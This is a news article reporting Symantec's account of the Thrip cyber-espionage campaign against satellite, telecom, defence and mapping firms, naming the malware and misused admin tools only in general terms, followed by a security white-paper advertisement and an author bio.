Home Security Defence, satellite firms targeted by China-based computers: claim

Defence, satellite firms targeted by China-based computers: claim

Computers based in China are alleged to have been used to target satellite, telecommunications, defence and geospatial imaging and mapping organisations in the US and Southeast Asia in what appears to be a cyber espionage campaign, according to the American security company Symantec.

In a blog post, Symantec researchers said they had used the company's targeted attack analytics (TAA) tool to track an alert at a big telco in Southeast Asia, where they found that an attacker was using PsExec to move between systems.

PsExec is a legitimate Microsoft Sysinternals tool for running processes on other systems and misuse can be difficult to spot. But with the TAA tool, Symantec said it was able to spot that this was malicious use of PsExec and the aim was to install malware within the breached network.

The company said it found that the malware was an updated version of a trojan known as Trojan.Rikamanu which has been associated with a group known as Thrip that it has been following for the last five years. Also used in the attack was new malware which Symantec christened Infostealer.Catchamas.

The Thrip attacks were identified as coming from three computers in China, the company said, though it did not specify how it had come to this determination. Security researchers generally agree that attribution is the hardest part of their job.

The satellite communications operator which was targeted and the attackers appeared to be interested in the company's operations as they infected computers running software that monitored and controlled satellites, Symantec said.

In the case of the geospatial imaging and mapping company, Thrip seemed to be again interested in operations and targeted machines that were running MapXtreme GIS (Geographic Information System) software that is used for developing custom geospatial applications or integrating location-based data into other applications. Machines running Google Earth Server and Garmin imaging software were also targeted.

Three telcos in Southeast Asia were also targeted by Thrip; again, the companies appeared to be the target, not their customers. Symantec did not provide any details about the defence contractor which was targeted; presumably this was an American company.

The researchers said the Thrip attackers had broadened the range of tools they were using over the last five years. For the most recent wave of attacks which began last year, the group was using custom malware and common legitimate tools.

In the latter category were:

  • PsExec: Microsoft Sysinternals tool for executing processes on other systems. The tool was primarily used by the attackers to move laterally on the victim’s network.
  • PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance.
  • Mimikatz: Freely available tool capable of changing privileges, exporting security certificates, and recovering Windows passwords in plaintext.
  • WinSCP: Open source FTP, SSH and SCP client used to exfiltrate data from targeted organisations.
  • LogMeIn: Cloud-based remote access software. It’s unclear whether the attackers gained unauthorised access to the victim’s LogMeIn accounts or whether they created their own.

"From the initial alert triggered by TAA, we were able to follow a trail that eventually enabled us to see the bigger picture of a cyber espionage campaign originating from computers within China and targeting multiple organisations in the US and Southeast Asia," the researchers said.

"Espionage is the group’s likely motive but given its interest in compromising operational systems, it could also adopt a more aggressive, disruptive stance should it choose to do so."


Australia is a cyber espionage hot spot.

As we automate, script and move to the cloud, more and more businesses are reliant on infrastructure that has the high potential to be exposed to risk.

It only takes one awry email to expose an accounts’ payable process, and for cyber attackers to cost a business thousands of dollars.

In the free white paper ‘6 Steps to Improve your Business Cyber Security’ you’ll learn some simple steps you should be taking to prevent devastating and malicious cyber attacks from destroying your business.

Cyber security can no longer be ignored, in this white paper you’ll learn:

· How does business security get breached?
· What can it cost to get it wrong?
· 6 actionable tips



Ransomware attacks on businesses and institutions are now the most common type of malware breach, accounting for 39% of all IT security incidents, and they are still growing.

Criminal ransomware revenues are projected to reach $11.5B by 2019.

With a few simple policies and procedures, plus some cutting-edge endpoint countermeasures, you can effectively protect your business from the ransomware menace.


Sam Varghese

website statistics

A professional journalist with decades of experience, Sam for nine years used DOS and then Windows, which led him to start experimenting with GNU/Linux in 1998. Since then he has written widely about the use of both free and open source software, and the people behind the code. His personal blog is titled Irregular Expression.


Popular News